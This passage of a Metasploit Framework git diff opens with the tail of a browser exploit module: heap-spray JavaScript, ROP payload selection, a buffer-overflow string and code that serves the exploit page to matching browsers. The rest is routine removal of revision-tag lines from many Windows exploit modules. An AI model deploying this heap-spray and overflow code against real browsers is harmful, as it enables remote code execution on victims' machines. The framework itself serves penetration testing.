unescapestr = ""; + for (var i = 0; i < blocklen-1; i=i+4) + { + unescapestr += "%u" + block.substring(i,i+4); + } + return unescapestr; + } + + var heap_obj = new heapLib.ie(0x10000); + var code = unescape("#{js_code}"); + var nops = unescape("#{js_random_nops}"); + while (nops.length < 0x80000) nops += nops; + var offset_length = #{my_target['Offset']}; + for (var i=0; i < 0x1000; i++) { + var padding = unescape(tounescape(randomblock(0x1000))); + while (padding.length < 0x1000) padding+= padding; + var junk_offset = padding.substring(0, offset_length); + var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length); + while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock; + sprayblock = single_sprayblock.substring(0, (0x40000-6)/2); + heap_obj.alloc(sprayblock); + } + | + + else + # For IE 6, 7, 8 + js = %Q| + var heap_obj = new heapLib.ie(0x20000); + var code = unescape("#{js_code}"); + var nops = unescape("#{js_nops}"); + while (nops.length < 0x80000) nops += nops; + var offset = nops.substring(0, #{my_target['Offset']}); + var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); + while (shellcode.length < 0x40000) shellcode += shellcode; + var block = shellcode.substring(0, (0x80000-6)/2); + heap_obj.gc(); + for (var i=1; i < 0x300; i++) { + heap_obj.alloc(block); + } + var overflow = nops.substring(0, 10); + | + + end + + js = heaplib(js, {:noobfu => true}) + + if datastore['OBFUSCATE'] + js = ::Rex::Exploitation::JSObfu.new(js) + js.obfuscate + end + + return js + end + + def get_payload(t, cli) + code = payload.encoded + + # No rop. Just return the payload. + return code if t['Rop'].nil? + + # Both ROP chains generated by mona.py - See corelan.be + case t['Rop'] + when :jre + print_status("Using JRE ROP") + rop_payload = generate_rop_payload('java', code)#, {'pivot'=>stack_pivot}) + end + + return rop_payload + end + + def load_exploit_html(my_target, cli) + p = get_payload(my_target, cli) + js = ie_heap_spray(my_target, p) + + bof = rand_text_alpha(512) # offset to eip" + bof << [my_target.ret].pack("V") + if my_target['Rop'] + bof << rand_text_alpha(4) + bof << [0x0c0c0c0c].pack("V") # new stack + end + + my_bof = Rex::Text.to_unescape(bof) + + html = %Q| + + + + + + + + + + + + + | + + return html + end + + def on_request_uri(cli, request) + agent = request.headers['User-Agent'] + uri = request.uri + print_status("Requesting: #{uri}") + + my_target = get_target(agent) + # Avoid the attack if no suitable target found + if my_target.nil? + print_error("Browser not supported, sending 404: #{agent}") + send_not_found(cli) + return + end + + html = load_exploit_html(my_target, cli) + html = html.gsub(/^\t\t/, '') + print_status("Sending HTML...") + send_response(cli, html, {'Content-Type'=>'text/html'}) + end + +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/real_arcade_installerdlg.rb b/modules/exploits/windows/browser/real_arcade_installerdlg.rb index da470108d6..c44aa0c37d 100644 --- a/modules/exploits/windows/browser/real_arcade_installerdlg.rb +++ b/modules/exploits/windows/browser/real_arcade_installerdlg.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'rgod', #Initial discovery, poc 'sinn3r', #msf ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '71559' ], diff --git a/modules/exploits/windows/browser/realplayer_cdda_uri.rb b/modules/exploits/windows/browser/realplayer_cdda_uri.rb index b36b9eaab1..040b7d28fc 100644 --- a/modules/exploits/windows/browser/realplayer_cdda_uri.rb +++ b/modules/exploits/windows/browser/realplayer_cdda_uri.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'bannedit', 'sinn3r' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-3747' ], diff --git a/modules/exploits/windows/browser/realplayer_console.rb b/modules/exploits/windows/browser/realplayer_console.rb index 5b579df999..7f00c926a0 100644 --- a/modules/exploits/windows/browser/realplayer_console.rb +++ b/modules/exploits/windows/browser/realplayer_console.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Elazar Broad ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-1309' ], diff --git a/modules/exploits/windows/browser/realplayer_import.rb b/modules/exploits/windows/browser/realplayer_import.rb index 3dc62cd08e..8c9c163770 100644 --- a/modules/exploits/windows/browser/realplayer_import.rb +++ b/modules/exploits/windows/browser/realplayer_import.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-5601' ], diff --git a/modules/exploits/windows/browser/realplayer_qcp.rb b/modules/exploits/windows/browser/realplayer_qcp.rb index dacabdebe1..e4ed63dc45 100644 --- a/modules/exploits/windows/browser/realplayer_qcp.rb +++ b/modules/exploits/windows/browser/realplayer_qcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote At this moment this module exploits the flaw on Windows XP IE6, IE7. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'Sean de Regge', # Vulnerability discovery diff --git a/modules/exploits/windows/browser/realplayer_smil.rb b/modules/exploits/windows/browser/realplayer_smil.rb index dca74fb029..f2dd12d263 100644 --- a/modules/exploits/windows/browser/realplayer_smil.rb +++ b/modules/exploits/windows/browser/realplayer_smil.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0455' ], diff --git a/modules/exploits/windows/browser/roxio_cineplayer.rb b/modules/exploits/windows/browser/roxio_cineplayer.rb index 3a63920525..3b3f11cc39 100644 --- a/modules/exploits/windows/browser/roxio_cineplayer.rb +++ b/modules/exploits/windows/browser/roxio_cineplayer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancer ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-1559' ], diff --git a/modules/exploits/windows/browser/safari_xslt_output.rb b/modules/exploits/windows/browser/safari_xslt_output.rb index e67ba8b8ea..8d4f81f4e5 100644 --- a/modules/exploits/windows/browser/safari_xslt_output.rb +++ b/modules/exploits/windows/browser/safari_xslt_output.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => ['Nicolas Gregoire'], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2011-1774'], diff --git a/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb b/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb index 91bd63536e..459c245cbe 100644 --- a/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb +++ b/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-4475' ], diff --git a/modules/exploits/windows/browser/softartisans_getdrivename.rb b/modules/exploits/windows/browser/softartisans_getdrivename.rb index b08aa431b5..c5b72f4817 100644 --- a/modules/exploits/windows/browser/softartisans_getdrivename.rb +++ b/modules/exploits/windows/browser/softartisans_getdrivename.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-1682' ], diff --git a/modules/exploits/windows/browser/sonicwall_addrouteentry.rb b/modules/exploits/windows/browser/sonicwall_addrouteentry.rb index aeb9976a44..7c7fb2dd35 100644 --- a/modules/exploits/windows/browser/sonicwall_addrouteentry.rb +++ b/modules/exploits/windows/browser/sonicwall_addrouteentry.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-5603'], diff --git a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb index 9e7140bd2f..0b9454a827 100644 --- a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb +++ b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'BID', '36346' ], diff --git a/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb b/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb index 4dd6f0fee7..8ce25dd3f0 100644 --- a/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb +++ b/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3033' ], diff --git a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb index 7eff754f6e..5234ebaff7 100644 --- a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb +++ b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4388' ], diff --git a/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb b/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb index 5bcb037e8e..f916a8a1fb 100644 --- a/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb +++ b/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Elazar Broad ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-6016' ], diff --git a/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb b/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb index baa125cc07..39eef2d54b 100644 --- a/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb +++ b/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Nikolas Sotiriu (lofi)' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3031'], diff --git a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb index e251f12c07..fa818cd3df 100644 --- a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb +++ b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4385' ], diff --git a/modules/exploits/windows/browser/teechart_pro.rb b/modules/exploits/windows/browser/teechart_pro.rb index cc71e7c0d4..a4d4f7ac11 100644 --- a/modules/exploits/windows/browser/teechart_pro.rb +++ b/modules/exploits/windows/browser/teechart_pro.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ### # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -49,7 +45,6 @@ class Metasploit3 < Msf::Exploit::Remote 'mr_me ', # initial discovery/msf module 'sinn3r', #Auto target, obfuscation, lots of testing ], - 'Version' => '$Revision$', 'References' => [ #[ 'CVE', '?' ], diff --git a/modules/exploits/windows/browser/trendmicro_extsetowner.rb b/modules/exploits/windows/browser/trendmicro_extsetowner.rb index d319f1ec8a..a291ec056a 100644 --- a/modules/exploits/windows/browser/trendmicro_extsetowner.rb +++ b/modules/exploits/windows/browser/trendmicro_extsetowner.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -55,7 +51,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancer ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-3189' ], diff --git a/modules/exploits/windows/browser/trendmicro_officescan.rb b/modules/exploits/windows/browser/trendmicro_officescan.rb index e6f4da6fb2..a84bb284ef 100644 --- a/modules/exploits/windows/browser/trendmicro_officescan.rb +++ b/modules/exploits/windows/browser/trendmicro_officescan.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-0325' ], diff --git a/modules/exploits/windows/browser/tumbleweed_filetransfer.rb b/modules/exploits/windows/browser/tumbleweed_filetransfer.rb index d4ccb2e5c2..b32e45309e 100644 --- a/modules/exploits/windows/browser/tumbleweed_filetransfer.rb +++ b/modules/exploits/windows/browser/tumbleweed_filetransfer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => 'patrick', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-1724' ], diff --git a/modules/exploits/windows/browser/ultraoffice_httpupload.rb b/modules/exploits/windows/browser/ultraoffice_httpupload.rb index 10b501169d..302a822239 100644 --- a/modules/exploits/windows/browser/ultraoffice_httpupload.rb +++ b/modules/exploits/windows/browser/ultraoffice_httpupload.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'shinnai', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-3878' ], diff --git a/modules/exploits/windows/browser/verypdf_pdfview.rb b/modules/exploits/windows/browser/verypdf_pdfview.rb index 0101154ea6..643e5f6bca 100644 --- a/modules/exploits/windows/browser/verypdf_pdfview.rb +++ b/modules/exploits/windows/browser/verypdf_pdfview.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC', 'dean ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-5492'], diff --git a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb index bcd12f64a7..3b773aed04 100644 --- a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb +++ b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote 'TecR0c ', # Metasploit module 'mr_me ' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0356' ], diff --git a/modules/exploits/windows/browser/vlc_amv.rb b/modules/exploits/windows/browser/vlc_amv.rb index b934a25879..64c53be79d 100644 --- a/modules/exploits/windows/browser/vlc_amv.rb +++ b/modules/exploits/windows/browser/vlc_amv.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote please note that IE 8 targets require Java support in order to run properly. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'sinn3r', diff --git a/modules/exploits/windows/browser/webdav_dll_hijacker.rb b/modules/exploits/windows/browser/webdav_dll_hijacker.rb index 663f51bb06..c21a92f050 100644 --- a/modules/exploits/windows/browser/webdav_dll_hijacker.rb +++ b/modules/exploits/windows/browser/webdav_dll_hijacker.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -36,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jcran', # Exploit vectors ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['URL', 'http://blog.zoller.lu/2010/08/cve-2010-xn-loadlibrarygetprocaddress.html'], diff --git a/modules/exploits/windows/browser/webex_ucf_newobject.rb b/modules/exploits/windows/browser/webex_ucf_newobject.rb index 6e623274e4..3674054caf 100644 --- a/modules/exploits/windows/browser/webex_ucf_newobject.rb +++ b/modules/exploits/windows/browser/webex_ucf_newobject.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -43,7 +39,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Guido Landi', # milw0rm exploit 'jduck' # metasploit version ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-3558' ], diff --git a/modules/exploits/windows/browser/winamp_playlist_unc.rb b/modules/exploits/windows/browser/winamp_playlist_unc.rb index 7b8ebfa080..1ddbca6f78 100644 --- a/modules/exploits/windows/browser/winamp_playlist_unc.rb +++ b/modules/exploits/windows/browser/winamp_playlist_unc.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'hdm', 'Faithless ' ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-0476'], diff --git a/modules/exploits/windows/browser/winamp_ultravox.rb b/modules/exploits/windows/browser/winamp_ultravox.rb index 611dd437ad..0f6ffdda68 100644 --- a/modules/exploits/windows/browser/winamp_ultravox.rb +++ b/modules/exploits/windows/browser/winamp_ultravox.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0065' ], diff --git a/modules/exploits/windows/browser/windvd7_applicationtype.rb b/modules/exploits/windows/browser/windvd7_applicationtype.rb index f46f569d83..5d3c984f3f 100644 --- a/modules/exploits/windows/browser/windvd7_applicationtype.rb +++ b/modules/exploits/windows/browser/windvd7_applicationtype.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-0348' ], diff --git a/modules/exploits/windows/browser/winzip_fileview.rb b/modules/exploits/windows/browser/winzip_fileview.rb index 263aae89bb..afb6b71111 100644 --- a/modules/exploits/windows/browser/winzip_fileview.rb +++ b/modules/exploits/windows/browser/winzip_fileview.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -38,7 +34,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'dean ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE','2006-5198' ], diff --git a/modules/exploits/windows/browser/wmi_admintools.rb b/modules/exploits/windows/browser/wmi_admintools.rb index d3304956d8..203571bbbe 100644 --- a/modules/exploits/windows/browser/wmi_admintools.rb +++ b/modules/exploits/windows/browser/wmi_admintools.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -46,7 +42,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'WooYun', 'MC', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '69942'], diff --git a/modules/exploits/windows/browser/xmplay_asx.rb b/modules/exploits/windows/browser/xmplay_asx.rb index 0ff06b7f33..c9652d1f25 100644 --- a/modules/exploits/windows/browser/xmplay_asx.rb +++ b/modules/exploits/windows/browser/xmplay_asx.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-6063'], diff --git a/modules/exploits/windows/browser/yahoomessenger_fvcom.rb b/modules/exploits/windows/browser/yahoomessenger_fvcom.rb index 060e784c55..03079e7280 100644 --- a/modules/exploits/windows/browser/yahoomessenger_fvcom.rb +++ b/modules/exploits/windows/browser/yahoomessenger_fvcom.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-4515' ], diff --git a/modules/exploits/windows/browser/yahoomessenger_server.rb b/modules/exploits/windows/browser/yahoomessenger_server.rb index 5936f11f06..3860acd820 100644 --- a/modules/exploits/windows/browser/yahoomessenger_server.rb +++ b/modules/exploits/windows/browser/yahoomessenger_server.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-3147' ], diff --git a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb index 18f7d8171a..98a65fe6a3 100644 --- a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb +++ b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-2987' ], diff --git a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb index 1e1845e478..c926eb270c 100644 --- a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb +++ b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm', 'spoonm', 'cazz' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0352' ], diff --git a/modules/exploits/windows/dcerpc/ms05_017_msmq.rb b/modules/exploits/windows/dcerpc/ms05_017_msmq.rb index 5876859957..82971236ac 100644 --- a/modules/exploits/windows/dcerpc/ms05_017_msmq.rb +++ b/modules/exploits/windows/dcerpc/ms05_017_msmq.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0059'], diff --git a/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb b/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb index edbe399c94..5de7b057b2 100644 --- a/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb +++ b/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Unknown' # 2 unknown contributors (2003 support) ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-1748'], diff --git a/modules/exploits/windows/dcerpc/ms07_065_msmq.rb b/modules/exploits/windows/dcerpc/ms07_065_msmq.rb index fbd9dc68d2..fe973a3415 100644 --- a/modules/exploits/windows/dcerpc/ms07_065_msmq.rb +++ b/modules/exploits/windows/dcerpc/ms07_065_msmq.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-3039'], diff --git a/modules/exploits/windows/driver/broadcom_wifi_ssid.rb b/modules/exploits/windows/driver/broadcom_wifi_ssid.rb index 0f224d7e45..740492065d 100644 --- a/modules/exploits/windows/driver/broadcom_wifi_ssid.rb +++ b/modules/exploits/windows/driver/broadcom_wifi_ssid.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -39,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote 'hdm' # porting the C version to ruby ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-5882'], diff --git a/modules/exploits/windows/driver/dlink_wifi_rates.rb b/modules/exploits/windows/driver/dlink_wifi_rates.rb index abf673b7d5..d716b045fe 100644 --- a/modules/exploits/windows/driver/dlink_wifi_rates.rb +++ b/modules/exploits/windows/driver/dlink_wifi_rates.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -57,7 +53,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Johnny Cache ' # making all of this possible ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-6055'], diff --git 